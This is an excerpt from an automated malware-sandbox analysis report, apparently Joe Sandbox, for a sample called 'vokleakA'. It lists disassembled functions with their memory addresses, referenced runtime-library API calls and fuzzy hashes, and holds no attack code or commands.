Instruction ID: c632ffdd0dde03a66eb5f339f6114047beab4ea22a6a35c089a809cbfac46d68
Opcode Fuzzy Hash: d584beedd247f27c37316edb6b0235e71218323ebe92c2957216e160ef03f28b
Instruction Fuzzy Hash: 36216D34B101159FDB089F69C558B9EBBF6BF88710F214169E502EB3A1CFB19C01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 35BD36B1 Relevance: 1.3, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 35BD36CB

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: bced5d5f9a7e1fe97527bb90f9fa097cdc176cf20dae8f1c7f77d8822539076d
Instruction ID: 8056c6f1e374bd0302eeb3c344b8f8d07518786380c704b20dd564316676d3b6
Opcode Fuzzy Hash: bced5d5f9a7e1fe97527bb90f9fa097cdc176cf20dae8f1c7f77d8822539076d
Instruction Fuzzy Hash: C1118C74B40204DFDB049F69C499FAEBBE6EF88710F144069E906AB3A1CEB19C41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 35BD41A7 Relevance: 1.3, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 35BD41C5

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 49a488f032e5504598de9e7b9aedb85056d9e22860e87c9495431629e5d4c0be
Instruction ID: 17bf9827cce8cd6ff010b831cad6121d3398e44c0e1e3f527c73b753445c88cb
Opcode Fuzzy Hash: 49a488f032e5504598de9e7b9aedb85056d9e22860e87c9495431629e5d4c0be
Instruction Fuzzy Hash: 86016D75B505149FDB089F68C559BAEBBF6AF8C700F214069E506EB3A0CFB15D06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 35BD2C80 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

LR]q, xrefs: 35BD2C95

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 5577f1486c2af98a287eed3f945372859ccea13a776f84aaefc87380ae7cb247
Instruction ID: 2da187de311e153d32c00de60e34c96bcfe545aafad496b6827c5553b1da8ca1
Opcode Fuzzy Hash: 5577f1486c2af98a287eed3f945372859ccea13a776f84aaefc87380ae7cb247
Instruction Fuzzy Hash: 55016275B402599FDB48EFA8C901B9EF7F5FF48600F104169E549EB250EB70AE0187C5

Uniqueness

Uniqueness Score: -1.00%

Function 35BD2C70 Relevance: 1.3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 35BD2C95

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: eda321d35dfa0b7dedd8ad67d56d8916969e87686d19a0176065c7a890b7e3b9
Instruction ID: 3f46a3a8d55c4aa2ee21f921fab370ac12ecb1ae8b1373cda0d1dae8a31094a3
Opcode Fuzzy Hash: eda321d35dfa0b7dedd8ad67d56d8916969e87686d19a0176065c7a890b7e3b9
Instruction Fuzzy Hash: 1001A270F00219AFE708EF78C901A5EB6F5FF48610F104169D956E7264EB705E0187D5

Uniqueness

Uniqueness Score: -1.00%

Function 35BD3E80 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023cbcb75fea7e207391386d885c118a052a16c2fd8717f9e9c46140a315bb97
Instruction ID: a73ae7e1516ac3dc4ba7aedf76fb02b1c3a3c56438432d104da48f730c6cc4af
Opcode Fuzzy Hash: 023cbcb75fea7e207391386d885c118a052a16c2fd8717f9e9c46140a315bb97
Instruction Fuzzy Hash: DB71FD34B003259BDB1DAFB4C45496E77E7BFC9245B21493DD80AAB384DF7998078B81

Uniqueness

Uniqueness Score: -1.00%

Function 31ABD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a109b2c8c7565b2610733018791d14d01210676fee298b537d77ded25ccdeb73
Instruction ID: 75df599cd94a278bc32abb8638f2c2c532ea5ef923d74707e0e471ff7a9ac481
Opcode Fuzzy Hash: a109b2c8c7565b2610733018791d14d01210676fee298b537d77ded25ccdeb73
Instruction Fuzzy Hash: C121E275500384DFEB06DF24DDC0B06BF69FB88359F24C669DD090B256C33AD456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 35BD2FA8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c921c2d328b0a75b0829bcadabe5bd4006e13236ea28cc7ebcb6563c10c9378f
Instruction ID: 5f520bf5b0468d8d6d5e3794c447fdf0c4505e2c2f56c784153941d5d11184ae
Opcode Fuzzy Hash: c921c2d328b0a75b0829bcadabe5bd4006e13236ea28cc7ebcb6563c10c9378f
Instruction Fuzzy Hash: 89213034A006158FCF05EF74C5546AEBBF6EF89619F104428C406BB765DF359C46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 31ABD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction ID: dac591a9003be4174fab31c50431d5679b2515c2bd58d7532e58085490abf84f
Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction Fuzzy Hash: 5C11D376504280CFDB02CF10D9C4B06BF71FB88318F24C6A9DD490B256C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 35BD3E7D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afbeb37c841b1c3768619c2a2fe404304997365d98edf1f85f7d4d6d37a0cf29
Instruction ID: 04e4535e2e3f7bcbeb50d770cbe433d60bc6684a6ce639feaf98f91e0e027e48
Opcode Fuzzy Hash: afbeb37c841b1c3768619c2a2fe404304997365d98edf1f85f7d4d6d37a0cf29
Instruction Fuzzy Hash: 8E01B13470032187DB08AB78895459E73EBAFC9658B00453EDD0AA7385EF349C0B87C2

Uniqueness

Uniqueness Score: -1.00%

Function 35BD51E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 783eb075fa00596135bb4f30ae41dc16b7fee9c7c96ed6e068acece3c8161a7b
Instruction ID: e670598b84a9d72d23de08a585ba50099cb6aef24956e6e0d85322d804fbc413
Opcode Fuzzy Hash: 783eb075fa00596135bb4f30ae41dc16b7fee9c7c96ed6e068acece3c8161a7b
Instruction Fuzzy Hash: 0D012C30B002169B8F49EBB884119AEB7E6AF85210B514639C11DAB384EF399D0687D1

Uniqueness

Uniqueness Score: -1.00%

Function 31ABD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a213ace06515e485e8a1f209b9e762101f6a3e0bf373187f5dbe7acb1082407
Instruction ID: 1dcd32d9e8bc0390dbe7571d3d4b0c19186f4e2c0bb1ca41c26ecff1cfa62ff8
Opcode Fuzzy Hash: 2a213ace06515e485e8a1f209b9e762101f6a3e0bf373187f5dbe7acb1082407
Instruction Fuzzy Hash: 63012B710043849EFB118E15CD80B57FF9CEF453F9F18C429ED491B246C6799801CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 35BD1A60 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8078739af6b0ea62e5c227eb9b6b28e3488c0dfb567ca97978df5591721dfc
Instruction ID: 239acd0081b9148da34bbab43f21a677d83743f8b9eb4fab1fa393d8dd64bffa
Opcode Fuzzy Hash: 6f8078739af6b0ea62e5c227eb9b6b28e3488c0dfb567ca97978df5591721dfc
Instruction Fuzzy Hash: A91100B48003898FCB20DF9AC545B9EFBF4EB09320F20845AD559B7250C379A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 31ABD01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2108924b7cf4d22c00348f3bbe2f3a9fe5f01e05fb354e3ee8a94229a126e44
Instruction ID: 2410720becc29408d305490f08d2a464bc1e765e19dfa20392d31866a70ae725
Opcode Fuzzy Hash: b2108924b7cf4d22c00348f3bbe2f3a9fe5f01e05fb354e3ee8a94229a126e44
Instruction Fuzzy Hash: 2FF0C2B1004384AEE7118E16CD84B62FF9CEF42379F18C45AED481A286C2799840CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 35BD2C2B Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b884dcd378c0d3fab888cfad4c41c6bcddb568230554e2c5167edda9644070
Instruction ID: 31b9e9ca3eda7e2ca75f286164b8fd174dd544e9bdd6618f21cb5d7aa1f27f52
Opcode Fuzzy Hash: 05b884dcd378c0d3fab888cfad4c41c6bcddb568230554e2c5167edda9644070
Instruction Fuzzy Hash: F6F0223170C3926FC302ABBCD41189A3FF4AF8722039500E7C045CF2BACA289C0983E2

Uniqueness

Uniqueness Score: -1.00%

Function 35BD2C40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f919c7ab122e83090b99ee6656c67e947466a1e1fa4f2637363a74ae20a88fba
Instruction ID: 16088b36a1b5f549a26d5efd6f6b4e7e8c4c70f6e536eb942d392985433b36a8
Opcode Fuzzy Hash: f919c7ab122e83090b99ee6656c67e947466a1e1fa4f2637363a74ae20a88fba
Instruction Fuzzy Hash: 7DD0A7327000155FC600A6FDE40485E37DD9FCA51079000A5D109DF364CE65EC0113C5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.VOKLEAKA(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.VOKLEAKA(80070057), ref: 00401800
EntryPoint.VOKLEAKA(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.VOKLEAKA(8007000E), ref: 00401839
EntryPoint.VOKLEAKA(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(00422910), ref: 00414050

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

